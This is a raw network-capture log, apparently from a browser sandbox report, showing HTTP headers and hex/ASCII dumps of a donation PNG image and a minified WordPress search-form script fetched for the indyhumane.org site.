                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 562791
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/06/donate.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 15 Jun 2023 23:56:53 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC778INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 84 00 00 02 75 08 06 00 00 00 81 f7 3e 33 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 49 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52 00 c8 2e 54 c8 14 00 c8 18
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRu>3gAMAaIiCCPsRGB IEC61966-2.1HSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R.T
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 91 5d 48 23 f2 2d 72 14 39 8d 5c 40 fa 90 db c8 20 32 8a fc 8a bc 47 31 94 81 b2 51 03 d4 02 75 40 b9 a8 1f 1a 8a c6 a0 73 d1 74 34 0f 5d 80 96 a2 6b d1 1a b4 1e 3d 80 b6 a2 a7 d1 4b e8 75 74 00 7d 8a 8e 63 80 d1 31 0e 66 8c d9 61 5c 8c 87 45 60 89 58 1a 26 c7 16 63 e5 58 35 56 8f 35 63 1d 58 37 76 15 1b c0 9e 61 ef 08 24 02 8b 80 13 ec 08 5e 84 10 c2 6c 82 90 90 47 58 4c 58 43 a8 25 ec 23 b4 12 ba 08 57 09 83 84 31 c2 27 22 93 a8 4f b4 25 7a 12 f9 c4 78 62 3a b1 90 58 46 ac 26 ee 21 1e 21 9e 25 5e 27 0e 13 5f 93 48 24 0e c9 92 e4 4e 0a 21 25 90 32 49 0b 49 6b 48 db 48 2d a4 53 a4 3e d2 10 69 9c 4c 26 eb 90 6d c9 de e4 08 b2 80 ac 20 97 91 b7 90 0f 90 4f 92 fb c9 c3 e4 b7 14 3a c5 88 e2 4c 09 a2 24 52 a4 94 12 4a 35 65 3f e5 04 a5 9f 32 42 99 a0 aa 51 cd
                                                                                                                                                                                                                                                        Data Ascii: ]H#-r9\@ 2G1Qu@st4]k=Kut}c1fa\E`X&cX5V5cX7va$^lGXLXC%#W1'"O%zxb:XF&!!%^'_H$N!%2IIkHH-S>iL&m O:L$RJ5e?2BQ
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 6e ae f4 5a b9 63 15 61 95 64 55 ef 6a 97 d5 5b 56 7f 2a 17 95 5f ac 70 ac a8 ae f8 b0 46 b8 e6 e2 57 4e 5f d5 7c f5 79 6d da da de 4a b7 ca ed eb 48 eb a4 eb 6e ac f7 59 bf af 4a bd 6a 41 d5 d0 86 f0 0d ad 1b f1 8d e5 1b 5f 6d 4a de 74 a1 7a 6a f5 8e cd b4 cd ca cd 03 35 61 35 ed 5b cc b6 ac db f2 a1 36 a3 f6 7a 9d 7f 5d cb 56 fd ad ab b7 be d9 26 da d6 bf dd 77 7b f3 0e 83 1d 15 3b de ef 94 ec bc b5 2b 78 57 6b bd 45 7d f5 6e d2 ee 82 dd 8f 1a 62 1b ba bf e6 7e dd b8 47 77 4f c5 9e 8f 7b a5 7b 07 f6 45 ef eb 6a 74 6f 6c dc af bf bf b2 09 6d 52 36 8d 1e 48 3a 70 e5 9b 80 6f da 9b ed 9a 77 b5 70 5a 2a 0e c2 41 e5 c1 27 df a6 7c 7b e3 50 e8 a1 ce c3 dc c3 cd df 99 7f b7 f5 08 eb 48 79 2b d2 3a bf 75 ac 2d a3 6d a0 3d a1 bd ef e8 8c a3 9d 1d 5e 1d 47 be b7
                                                                                                                                                                                                                                                        Data Ascii: nZcadUj[V*_pFWN_|ymJHnYJjA_mJtzj5a5[6z]V&w{;+xWkE}nb~GwO{{EjtolmR6H:powpZ*A'|{PHy+:u-m=^G
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 66 76 81 c9 cb 4c d6 e6 b8 f6 f2 b0 71 98 c9 9f 5d d8 5d a5 aa 94 b9 32 42 23 da 3f e9 90 34 59 0f cd 0a ff 7c a7 cc 5e 8d cd 9c f6 cf d8 17 91 fe ac e0 b8 63 43 a4 06 3c e8 4d 37 d1 dc e7 7c 1d fe d9 32 9e da 12 0c 9e 38 83 96 a6 0e ff 3f 2d c5 76 fb d1 02 db f5 35 f2 45 36 41 77 cf 68 67 32 f9 f9 e9 c9 bc 1d 3e de 4d f7 5d f9 15 70 52 fb d6 24 f7 95 7e fe a7 e1 55 1a fe 48 78 aa 03 70 12 89 a6 91 59 46 e0 d8 fe aa 12 83 b3 f7 d8 79 4f 0c e0 6e 28 1b ab 38 7e b5 06 2b 91 39 44 7c e5 a6 d3 e7 0a ac b6 9a 46 33 7a 33 0d 8a 8f c7 ad 0c 8a 2a d3 d8 34 55 86 f7 65 cc 18 22 67 16 21 13 50 43 31 70 45 b2 0b 48 25 5b e5 1c 71 c6 39 37 2f 19 af b0 d5 42 d6 0e ab 99 ff 6a 7a 96 9f 41 85 4f 4a 88 3f 37 25 ba d5 99 11 ff b3 df 54 49 84 3e dc bd 8a a5 b3 b7 8b 25 0a
                                                                                                                                                                                                                                                        Data Ascii: fvLq]]2B#?4Y|^cC<M7|28?-v5E6Awhg2>M]pR$~UHxpYFyOn(8~+9D|F3z3*4Ue"g!PC1pEH%[q97/BjzAOJ?7%TI>%
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: b2 57 93 07 d1 24 e7 1d 58 19 f9 2b 05 f9 5d 46 e2 d2 29 0c 68 b1 bf f8 1c e5 a9 4c 1a 73 dc cf 9d c1 6c 45 b0 ca 6b b3 f1 e6 6d 23 d4 dd 0c 4f 75 2b 35 cd bf d1 0c 3b 7c fb dd 32 7e e9 78 12 67 50 e1 ae 9c d5 3e c8 8e 16 55 60 75 f6 cd a7 8d 5e c4 55 84 c9 99 ec 9d e5 b9 0b 4c 8e ac 64 cb 77 da ed f3 ea 6d 6e 3b 1e ef dc 29 bc e2 fb 0d 3a c0 07 f8 ae 31 c1 e4 90 75 06 45 82 15 c2 a7 33 e5 b6 d0 67 b3 2b e7 af 69 e4 ca f9 c2 08 0f 02 53 94 22 b5 59 c5 28 9e 2b 9d 78 5b 69 96 2f 2b 67 2e 63 0f a6 8b 70 4c 67 45 ed f2 f7 00 95 99 43 ea ec b9 f8 fc 6c d2 6a 6f 78 34 29 11 d1 b7 32 44 58 da 55 ba 0a ac fa 90 4d a4 34 16 f9 01 88 8c fd 2c 7d 35 f2 57 dd ba e9 60 51 81 c8 30 db 05 e6 04 3e 75 0c 77 0c 8d 08 ee f6 5f d5 39 a4 f8 be c1 13 fe e4 78 e3 f8 87 ac 88
                                                                                                                                                                                                                                                        Data Ascii: W$X+]F)hLslEkm#Ou+5;|2~xgP>U`u^ULdwmn;):1uE3g+iS"Y(+x[i/+g.cpLgECljox4)2DXUM4,}5W`Q0>uw_9x
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 95 59 0d cf 60 c7 20 ac 8c 7d 1b b6 35 20 02 a8 18 f3 fc e5 33 90 3b 74 45 cf 6f 03 67 06 59 f5 22 67 30 6b 3f 26 83 32 83 02 9d 9c 2a a0 32 a9 2a 53 4d f3 02 85 17 f9 17 ab 95 c3 28 74 e5 ec dd 81 27 ed 85 50 71 0e 23 b9 e1 9c 05 c3 1c 8c 4f b6 60 c7 22 ba 01 f1 cc 7e 6d 96 01 6d 11 66 e4 3c a1 e7 13 a0 f6 48 04 6c 75 ca f5 2f 11 be d6 29 84 a8 25 b4 eb 37 bf c3 c0 a7 89 27 28 c6 79 b4 d9 91 f1 fa fe f9 19 35 5d 1d bc ca 9e e2 f3 f7 6a dc af 80 9a dd b1 d7 5e be 8f 38 fe 68 d5 f7 92 19 c0 af 9f d0 07 95 b8 4f f4 07 73 6d b2 ed c5 df 28 da 96 f8 fd 98 e2 b2 df c9 75 0d ab 89 c6 25 3d 91 23 68 df bb 6c ac 10 56 0a fe 95 83 0e 95 9f 12 11 79 d6 73 fe b8 86 95 ed 9c 22 eb fa 46 4a 99 7b f0 5a 81 36 6d e5 5c d7 85 d3 14 0d 86 ea 8d 61 d7 96 d1 f6 39 87 ee bb
                                                                                                                                                                                                                                                        Data Ascii: Y` }5 3;tEogY"g0k?&2*2*SM(t'Pq#O`"~mmf<Hlu/)%7'(y5]j^8hOsm(u%=#hlVys"FJ{Z6m\a9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 9d 33 7d 99 32 ca f2 af 18 24 73 a0 90 de 2a b0 95 c1 27 8e e0 ca 01 ac 85 81 12 22 48 99 31 3c 6d 11 96 59 60 54 20 33 30 99 30 ba b3 5a 58 29 33 8a 5f 29 8f cc 51 d8 e9 cf 8f 1b d1 4c 72 6f 66 65 a8 ca 10 24 ce 9c c1 1d 07 31 33 d2 98 33 fb a9 76 dd 69 83 aa 13 93 dd 48 8c 66 59 e5 5c dd 27 b6 f3 30 3e ae ac 4e 66 e7 35 24 78 c7 f2 7e 35 e4 db 9e 19 4f e5 4e 21 75 06 31 22 a5 67 fd bc ca 5b e5 00 1c 8f 78 2e 86 39 83 3b 63 d7 d2 c2 da 6b 6b bb 79 01 76 26 4f 56 67 f9 50 cf 89 48 ba 12 da 4c 3c cb 37 f3 7e ec 14 32 f0 b6 42 7d 95 d1 e6 5d b5 ca 5d 39 79 6f 3b e6 9c 67 a5 7b ab 61 3b 65 de 01 a6 63 30 4e 1d c3 cc 29 64 f9 11 d7 1d bb ca e1 40 5b 8d 38 87 08 d9 a7 19 b2 f1 1c 8d a9 8a 53 b8 8a bb d3 73 56 66 55 f2 d7 ed d6 03 32 47 96 bd 7f 49 0f 04 4b f0
                                                                                                                                                                                                                                                        Data Ascii: 3}2$s*'"H1<mY`T 300ZX)3_)QLrofe$133viHfY\'0>Nf5$x~5ON!u1"g[x.9;ckkyv&OVgPHL<7~2B}]]9yo;g{a;ec0N)d@[8SsVfU2GIK
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: c2 1d e7 f0 ae 63 98 6d 6b 16 89 7d 96 9d 32 a2 30 37 31 69 7d 85 36 b7 65 c5 a6 c6 77 74 9e 5d 3c 8e 99 45 3b d8 34 ec d2 4c 96 f7 2d c7 24 4c fa 1d 42 eb 58 f1 59 04 64 f2 b9 29 22 86 7d 6a 20 ab b0 c9 be 37 c8 68 1d f9 0d f3 17 1a 78 05 d4 f9 25 8e a9 1d 40 3a a8 e6 81 b9 86 6c 06 64 c7 f1 9b 8d 0a e5 9a f6 91 19 17 8b 93 6d 35 8e a0 b2 d2 f0 ab 81 09 cb 52 be 3f c8 29 ac 6c d1 aa 86 7f 1b 2c a4 28 73 b8 77 c7 0a cd 58 88 7e e2 98 b1 67 f6 7e 17 3f b6 01 9b c4 10 79 66 20 ee d2 f4 99 44 49 76 63 98 88 e4 32 77 6a 1f 08 c8 66 7a 47 d8 f7 b6 1d 1a 01 55 19 bb 3c 0f 17 95 15 54 27 9a 8c a8 4e 94 ac 26 5c 22 88 da 3b 73 08 56 f8 d0 a1 d8 5f f9 f5 ba b0 3a 99 59 61 6d 74 d8 57 b8 ee 70 df ce 71 87 a9 4c b0 83 ee 3a 5f 99 51 1e 39 88 c8 fb e8 a8 08 84 3f 71
                                                                                                                                                                                                                                                        Data Ascii: cmk}2071i}6ewt]<E;4L-$LBXYd)"}j 7hx%@:ldm5R?)l,(swX~g~?yf DIvc2wjfzGU<T'N&\";sV_:YamtWpqL:_Q9?q
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: fe 59 ea 6a d9 1b db 2c 7d 45 b6 dc b1 39 76 fa f4 8e 5d c3 56 1a 96 17 dc 04 85 4c 7d 1e 38 f1 76 4c 67 f2 75 77 fc fd 21 7a 4f 02 3d 17 b4 45 f6 e9 2f 7e 1f 86 b7 5f 3e 0d 54 9e 04 8e bc 7d 4f 1d 23 c2 43 ab 0b 84 98 8d 86 df 2f c4 76 28 d1 d2 7d f9 77 da 31 db 1a 1d 8d 05 2b 3f eb 76 c7 1e 65 58 a7 ac 9c f8 96 d1 ab f0 f3 5d 3d e0 d4 39 9c 9d c2 ca f9 c2 27 ca ea 09 3c 71 f6 ee 94 51 75 0e 97 07 67 a5 d7 be cf 92 94 9e 29 b7 b7 e8 4c cf 48 ab 7f 9b 34 b7 14 cd be 5b 69 71 66 4e e2 6c c8 7a e7 70 8a 07 a6 fc 14 9f a0 f0 88 0c 6c 71 e1 b9 53 4e cb 81 fe fd 15 bc 8e 67 1b 99 33 41 15 c9 a7 89 8b 8c 03 52 64 c9 81 86 c0 74 8b 4e 52 76 66 ec 66 60 c7 47 96 e6 3b 00 c7 4f f4 2e 10 5e c1 f9 69 60 b4 58 1d 71 84 d5 5a 9e dd 50 18 97 cb 63 a3 f1 20 e4 5d c8 3b
                                                                                                                                                                                                                                                        Data Ascii: Yj,}E9v]VL}8vLguw!zO=E/~_>T}O#C/v(}w1+?veX]=9'<qQug)LH4[iqfNlzplqSNg3ARdtNRvff`G;O.^i`XqZPc ];
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 3e e4 14 66 02 2d 02 a6 4c 56 fd 17 f1 7e 46 62 15 be a5 df be 99 19 2a e3 b9 d2 27 99 51 b4 72 0a bd 51 bd 5e e5 a9 4e d0 35 f8 b5 34 b1 74 11 0e 1c 1f b8 45 c8 9e 43 c4 32 9c 3c 4b 0a 42 bd b3 3a 8e f1 09 f8 14 be 4f 39 2f 56 e6 44 69 10 9e 9c 0f 5b e5 ad e0 ce 1c 29 96 06 c7 c4 13 a8 dc c9 10 d1 74 07 d0 f9 45 dd 3d d2 cd 13 fe b6 be 2b 99 13 b5 69 86 c3 d3 d9 e0 7d 0d 99 de d8 b1 a5 30 cf c0 bb f8 c8 7b 1b bf d1 e7 74 34 2d d5 d7 a6 02 9e f7 e2 cf 7a ed ac 56 4d 8e 68 33 63 96 a0 c9 fa b0 92 86 d9 03 b3 af 30 e7 a9 d2 81 e0 78 5b 6d b1 9e cb 80 ec d3 16 2c cd 51 4e 3b cb 99 29 8b e4 9b dd 16 9a a7 1d bf 59 bd ab 5b 99 e9 19 c2 ef b0 47 98 42 b5 e5 b1 19 82 08 2c e3 5c 38 0b 0a f8 c8 0b fb 7f 8d 52 de 35 1c 11 b2 f4 15 21 12 29 94 95 71 53 89 5b 1a cb
                                                                                                                                                                                                                                                        Data Ascii: >f-LV~Fb*'QrQ^N54tEC2<KB:O9/VDi[)tE=+i}0{t4-zVMh3c0x[m,QN;)Y[GB,\8R5!)qS[


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        76192.168.2.449839192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC454OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/search-form.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC672INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 9956
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/search-form.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC697INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 36 39 31 35 38 3a 65 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 5b 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 5d 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 2c 21 31 29 2c 28 28 74 2c 69 29 3d 3e 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 73 3d 22 2e 74 68 72 76 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 2c 61 3d 65 3d 3e 7b 74 72 79 7b 6e 65 77 20 6e 28 74 28 65 29 2c 21 21 54 43 42 5f 46 72 6f 6e 74 2e 55 74 69 6c 73 2e 69 73 45 64 69 74 6f 72 50 61
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var e={69158:e=>{void 0===TCB_Front.js_modules["search-form"]&&TCB_Front.setModuleLoadedStatus("search-form",!1),((t,i)=>{if(TCB_Front.isModuleLoaded("search-form"))return;const s=".thrv-search-form",a=e=>{try{new n(t(e),!!TCB_Front.Utils.isEditorPa
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 74 6f 72 3d 74 2c 74 68 69 73 2e 24 69 6e 70 75 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 68 72 76 2d 73 66 2d 69 6e 70 75 74 2d 68 69 64 65 22 29 2c 74 68 69 73 2e 6f 6e 52 65 73 69 7a 65 28 29 2c 74 68 69 73 2e 69 73 45 64 69 74 6f 72 3f 74 68 69 73 2e 24 66 6f 72 6d 2e 6f 66 66 28 22 73 75 62 6d 69 74 22 29 2e 6f 6e 28 22 73 75 62 6d 69 74 22 2c 28 28 29 3d 3e 21 31 29 29 3a 74 68 69 73 2e 62 69 6e 64 45 76 65 6e 74 73 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 69 64 22 29 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 64 61 74 61 2d 73 65 6c 65 63 74 6f 72 22 2c 60 24 7b 73 7d 23 24 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 69 64 22 29 7d 60 29 2c 65 2e 64 61 74 61 28 22 74 63 62
                                                                                                                                                                                                                                                        Data Ascii: tor=t,this.$input.removeClass("thrv-sf-input-hide"),this.onResize(),this.isEditor?this.$form.off("submit").on("submit",(()=>!1)):this.bindEvents(),this.$element.attr("id")&&this.$element.attr("data-selector",`${s}#${this.$element.attr("id")}`),e.data("tcb
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 6b 3b 63 61 73 65 22 74 6f 6f 6c 74 69 70 2d 63 6c 69 63 6b 22 3a 63 61 73 65 22 74 6f 6f 6c 74 69 70 2d 68 6f 76 65 72 22 3a 74 68 69 73 2e 68 69 64 65 54 6f 6f 6c 74 69 70 28 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 22 2d 2d 74 76 65 2d 61 70 70 6c 69 65 64 2d 6d 61 78 2d 77 69 64 74 68 22 2c 22 22 29 2c 69 2e 69 6e 6c 69 6e 65 43 73 73 56 61 72 69 61 62 6c 65 28 74 68 69 73 2e 24 69 6e 70 75 74 2c 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 22 22 2c 74 72 61 6e 73 66 6f 72 6d 3a 22 22 2c 64 69 73 70 6c 61 79 3a 22 62 6c 6f 63 6b 22 7d 29 7d 7d 62 69 6e 64 45 76 65 6e 74 73 28 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 6f 6e 52 65 73 69 7a 65 2e 62 69
                                                                                                                                                                                                                                                        Data Ascii: k;case"tooltip-click":case"tooltip-hover":this.hideTooltip();break;default:i.inlineCssVariable(this.$element,"--tve-applied-max-width",""),i.inlineCssVariable(this.$input,{transition:"",transform:"",display:"block"})}}bindEvents(){const e=this.onResize.bi
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 73 65 65 6e 74 65 72 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 65 6e 74 65 72 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 2c 28 28 29 3d 3e 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 68 69 64 65 49 6e 70 75 74 54 69 6d 65 6f 75 74 29 7d 29 29 2c 74 68 69 73 2e 24 73 75 62 6d 69 74 2e 6f 66 66 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 22 2c 65 29 2c 74 68 69 73 2e 24 69 6e 70 75 74 2e 6f 66 66 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 29 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 73 65 61 72 63 68 5f 69 6e 70 75 74 22 2c 65 29 7d 69 73 48 6f 76 65 72 54 6f 6f 6c 74 69 70 28 29 7b 72 65
                                                                                                                                                                                                                                                        Data Ascii: seenter.search_input").on("mouseenter.search_input",(()=>{clearTimeout(this.hideInputTimeout)})),this.$submit.off("mouseleave.search").on("mouseleave.search",e),this.$input.off("mouseleave.search_input").on("mouseleave.search_input",e)}isHoverTooltip(){re
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 6f 6e 2d 64 69 73 70 6c 61 79 22 20 64 61 74 61 2d 73 65 6c 65 63 74 6f 72 3d 22 23 24 7b 65 7d 20 2e 74 63 62 2d 73 66 2d 63 6c 6f 73 65 2d 69 63 6f 6e 22 3e 3c 2f 73 76 67 3e 24 7b 69 2e 69 63 6f 6e 73 2e 67 65 74 28 22 63 72 6f 73 73 22 29 2e 72 65 70 6c 61 63 65 28 22 74 63 62 2d 63 72 6f 73 73 22 2c 22 74 63 62 2d 69 63 6f 6e 20 74 63 62 2d 63 72 6f 73 73 22 29 7d 3c 2f 64 69 76 3e 60 29 3a 73 2e 70 72 65 70 65 6e 64 28 60 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 68 72 76 5f 77 72 61 70 70 65 72 20 74 63 62 2d 73 66 2d 63 6c 6f 73 65 2d 69 63 6f 6e 20 74 68 72 76 5f 69 63 6f 6e 20 74 76 65 5f 6e 6f 5f 64 72 61 67 20 74 76 65 5f 6e 6f 5f 69 63 6f 6e 73 20 74 63 62 2d 69 63 6f 6e 2d 69 6e 68 65 72 69 74 2d 73 74 79 6c 65 20 74 63 62 2d 69 63 6f 6e 2d 64
                                                                                                                                                                                                                                                        Data Ascii: on-display" data-selector="#${e} .tcb-sf-close-icon"></svg>${i.icons.get("cross").replace("tcb-cross","tcb-icon tcb-cross")}</div>`):s.prepend(`<div class="thrv_wrapper tcb-sf-close-icon thrv_icon tve_no_drag tve_no_icons tcb-icon-inherit-style tcb-icon-d
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 72 6c 61 79 5f 73 68 6f 77 22 2c 5b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5d 29 7d 68 69 64 65 4f 76 65 72 6c 61 79 28 29 7b 69 2e 24 62 6f 64 79 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 62 6f 64 79 2d 73 65 61 72 63 68 2d 6f 76 65 72 6c 61 79 22 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 24 24 6f 76 65 72 6c 61 79 57 72 61 70 70 65 72 22 29 3f 74 68 69 73 2e 69 73 45 64 69 74 6f 72 3f 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 64 61 74 61 28 22 24 24 6f 76 65 72 6c 61 79 57 72 61 70 70 65 72 22 29 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 24 24 6f 76 65 72 6c 61 79 57 72 61 70 70 65 72 22 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76
                                                                                                                                                                                                                                                        Data Ascii: rlay_show",[this.$element])}hideOverlay(){i.$body.removeClass("tcb-body-search-overlay"),this.$element.data("$$overlayWrapper")?this.isEditor?(this.$element.data("$$overlayWrapper").remove(),this.$element.removeData("$$overlayWrapper"),this.$element.remov
